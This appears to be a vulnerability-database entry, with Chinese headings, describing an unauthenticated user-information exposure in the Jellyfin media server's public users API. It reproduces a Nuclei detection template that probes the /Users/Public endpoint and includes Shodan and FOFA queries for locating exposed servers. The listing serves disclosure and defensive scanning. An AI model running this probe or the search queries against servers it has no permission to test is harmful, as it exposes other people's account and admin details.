jellyfin-public-users-exposure: Jellyfin Public Users - Exposure

日期: 2026-01-24 | 影响软件: Jellyfin | POC: 已公开

漏洞描述

The Jellyfin media server exposed user information via the public users API endpoint. This endpoint could have leaked sensitive data including usernames, user IDs, server IDs, administrator status, password configuration, login activity, and user policies without authentication.

PoC代码[已公开]

id: jellyfin-public-users-exposure

info:
  name: Jellyfin Public Users - Exposure
  author: theamanrawat
  severity: medium
  description: |
    The Jellyfin media server exposed user information via the public users API endpoint. This endpoint could have leaked sensitive data including usernames, user IDs, server IDs, administrator status, password configuration, login activity, and user policies without authentication.
  reference:
    - https://github.com/jellyfin/jellyfin/issues/880
    - https://jellyfin.org/docs/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-200,CWE-306
  metadata:
    max-request: 2
    verified: true
    shodan-query: http.title:"Jellyfin"
    fofa-query: title="Jellyfin"
  tags: misconfig,jellyfin,exposure,api,disclosure

http:
  - method: GET
    path:
      - "{{BaseURL}}/Users/Public"
      - "{{BaseURL}}/jellyfin/Users/Public"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"Name"'
          - '"ServerId"'
          - '"Id"'
          - '"Policy"'
          - '"Configuration"'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022035a9176addf581fb56711bac812df0c1fc6b45b502bb0d6682a5a4c4dc98d2a7022100eb1ef99fd1a2d7f06d60b8e3daa11ec8beb833eff571911470a556e90e1c6b1f:922c64590222798bb761d5b6d8e72950

相关漏洞推荐